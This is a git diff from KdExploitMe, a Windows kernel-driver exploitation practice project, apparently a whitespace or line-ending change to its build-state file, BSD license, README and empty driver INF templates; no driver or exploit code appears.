+++ b/KdExploitMe/Win8.1Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win8.1 Debug|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win8.1 Debug|Win32|C:\Github\KdExploitMe\|
diff --git a/LICENSE b/LICENSE
index dc35191..921565b 100644
--- a/LICENSE
+++ b/LICENSE
@@ -1,24 +1,24 @@
-Copyright (c) 2014, clymb3r
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
- list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation
- and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
+Copyright (c) 2014, clymb3r
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
diff --git a/README.md b/README.md
index a2a701f..6174e3d 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
-KdExploitMe
-===========
-
-A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.
-
+KdExploitMe
+===========
+
+A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.
+
The intent of this driver is to educate security testers on how memory corruption issues in Windows kernel drivers can be exploited. Knowing how to exploit security issues allows security testers to prove that bugs are exploitable which can be used to convince developers to fix bugs. While these techniques can be used for evil, I have written this driver in the hopes that you will use this knowledge for good.
\ No newline at end of file
diff --git a/Win7Debug/KdExploitMe Package/KdExploitMe.inf b/Win7Debug/KdExploitMe Package/KdExploitMe.inf
index 2c8d443..584d879 100644
--- a/Win7Debug/KdExploitMe Package/KdExploitMe.inf
+++ b/Win7Debug/KdExploitMe Package/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.13.26.814
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.13.26.814
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/Win7Debug/KdExploitMe.inf b/Win7Debug/KdExploitMe.inf
index 2c8d443..584d879 100644
--- a/Win7Debug/KdExploitMe.inf
+++ b/Win7Debug/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.13.26.814
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.13.26.814
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/Win7Release/KdExploitMe Package/KdExploitMe.inf b/Win7Release/KdExploitMe Package/KdExploitMe.inf
index 83e8244..b22e15f 100644
--- a/Win7Release/KdExploitMe Package/KdExploitMe.inf
+++ b/Win7Release/KdExploitMe Package/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.12.12.543
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.12.12.543
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/Win7Release/KdExploitMe.inf b/Win7Release/KdExploitMe.inf
index 83e8244..b22e15f 100644
--- a/Win7Release/KdExploitMe.inf
+++ b/Win7Release/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.12.12.543
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.12.12.543
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"